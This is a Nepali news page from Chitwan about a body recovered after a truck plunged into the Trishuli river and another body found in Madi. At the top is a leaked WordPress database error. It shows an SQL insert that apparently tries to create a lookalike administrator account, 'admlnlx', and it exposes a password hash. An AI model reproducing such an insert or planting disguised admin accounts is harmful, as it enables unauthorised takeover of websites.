WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9MaiTojIXpMre33t8ioWIGGr5WnFY.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-03 00:43:18', '', 'admlnlx', 'admlnlx')
चितवन, माघ २२–
गत आईतबार त्रिशुली नदीमा ट्रक खस्दा बेपत्ता भएका एक जनाको शव फेला परेको छ ।
नदीबाट ट्रक निकाल्ने क्रममा आज दिउँसो ट्रकमा सवार गोरखा नागेश्वर–९ बस्ने ३७ वर्षीय कृष्णबाबु बस्नेतको शव भेटिएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ । ट्रक खसेको स्थानमा बस्नेतको शव तैरिरहेको अवस्थामा फेला परेको प्रहरीले जनाएको छ । उनको शव पोष्ट मार्टमका लागि भरतपुर अस्पतालमा राखिएको छ । गत माघ १६ गते दारेचोक–४ नाग्दी खोला नजिक वीरगञ्जबाट काठमाडौं तर्फ चामल लोड गरि जाँदै गरेको ना ५ खब ५६५४ नम्बरको ट्रक आफै अनियन्त्रित भई सडकबाट करिव ७५ मिटर तल त्रिशुली नदीमा खसेको थियो ।
यस्तै चितवनको माडीमा आज एक शव फेला परेको छ । गत बिहीबारदेखि हराई रहेका माडी नगरपालिका–९ बस्ने ६९ वर्षीय मनसरा सुनार आज घर नजिकै रहेको झाडीमा मृत फेला परेको चितवन प्रहरीले जनाएको छ । पोष्टमार्टमका लागि शव भरतपुर अस्पतालमा राखिएको छ ।